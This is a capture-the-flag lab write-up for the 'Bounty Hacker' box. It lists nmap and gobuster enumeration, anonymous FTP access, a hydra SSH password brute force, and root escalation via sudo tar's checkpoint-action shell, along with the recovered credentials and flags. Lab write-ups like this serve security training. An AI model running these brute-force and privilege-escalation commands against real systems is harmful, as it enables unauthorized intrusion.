================================================================================
CTF WRITEUP: BOUNTY HACKER
Target IP: 10.10.176.174
================================================================================

1. ENUMERATION
--------------------------------------------------------------------------------
Command: nmap -sC -sV 10.10.176.174
Results:
- 21/tcp (FTP)  - vsFTDP 3.0.5 (Anonymous Login Allowed)
- 22/tcp (SSH)  - OpenSSH 8.2p1
- 80/tcp (HTTP) - Apache 2.4.41

2. WEB DIRECTORY BRUTE FORCING
--------------------------------------------------------------------------------
Command: gobuster dir -u http://10.10.176.174/ -w /usr/share/wordlists/common.txt
Found: /images, /javascript (Standard directories, no hidden vectors found).

3. FTP EXPLOITATION (FOOTHOLD)
--------------------------------------------------------------------------------
Logged in as "anonymous" / "ftp":
Files found:
- task.txt  : Mentioned "Protect Vicious" and was signed by "-lin".
- locks.txt : A list of potential passwords.

Identified Potential Username: lin

4. INITIAL ACCESS (SSH)
--------------------------------------------------------------------------------
Brute-forcing "lin" using the custom wordlist (locks.txt) found on FTP:
Command: hydra -l lin -P locks.txt ssh://10.10.176.174
Credentials Found: lin : RedDr4gonSynd1cat3

SSH Login: ssh lin@10.10.176.174
User Flag: THM{CR1M3_SyNd1C4T3}

5. PRIVILEGE ESCALATION
--------------------------------------------------------------------------------
Checking Sudo Privileges:
Command: sudo -l
Result: (root) /bin/tar

GTFOBins Exploitation:
Since tar can execute commands via checkpoint actions, I used the following:
Command: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh



6. FINAL FLAGS
--------------------------------------------------------------------------------
[USER] lin@Desktop: cat user.txt -> THM{CR1M3_SyNd1C4T3}
[ROOT] root@root: cat root.txt -> THM{80UN7Y_h4cK3r}
================================================================================
